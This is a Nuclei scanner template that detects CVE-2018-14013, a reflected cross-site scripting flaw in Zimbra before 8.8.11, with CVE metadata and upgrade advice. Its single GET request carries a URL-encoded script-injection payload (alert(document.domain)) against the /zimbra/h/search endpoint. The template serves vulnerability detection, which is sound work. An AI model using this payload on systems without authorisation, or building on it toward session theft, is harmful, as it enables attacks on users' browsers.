nuclei-templates/http/cves/2018/CVE-2018-14013.yaml

51 lines
2.0 KiB
YAML
Raw Normal View History

2021-07-27 07:34:36 +00:00
id: CVE-2018-14013
info:
name: Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting
2021-07-27 07:34:36 +00:00
author: pikpikcu
severity: medium
description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 is vulnerable to cross-site scripting via the AJAX and html web clients.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:57:14 +00:00
remediation: |
Upgrade to a version of Synacor Zimbra Collaboration Suite Collaboration that is equal to or greater than 8.8.11 to mitigate the vulnerability.
reference:
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
- https://bugzilla.zimbra.com/show_bug.cgi?id=109018
- https://bugzilla.zimbra.com/show_bug.cgi?id=109017
- https://nvd.nist.gov/vuln/detail/CVE-2018-14013
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-14013
cwe-id: CWE-79
2023-08-31 11:46:18 +00:00
epss-score: 0.00512
epss-percentile: 0.73955
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: synacor
product: zimbra_collaboration_suite
2023-12-05 09:50:33 +00:00
tags: cve,cve2018,xss,zimbra,synacor
2021-07-27 07:34:36 +00:00
http:
2021-07-27 07:34:36 +00:00
- method: GET
path:
2021-08-03 07:43:57 +00:00
- "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-07-27 07:34:36 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-07-27 07:34:36 +00:00
words:
2021-08-03 07:43:57 +00:00
- '</script><script>alert(document.domain)</script>'
2021-07-27 07:34:36 +00:00
- type: word
part: header
words:
- text/html
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4a0a0047304502201f68e01812a6a2ac06cfbc727c2fc18af1f6d279cf8accaadb438dd8b388b2a4022100ce88ef90892dd6bc1304bb0e415d6f9b7fa3ffac32f17a6fd31d767a6a33303d:922c64590222798bb761d5b6d8e72950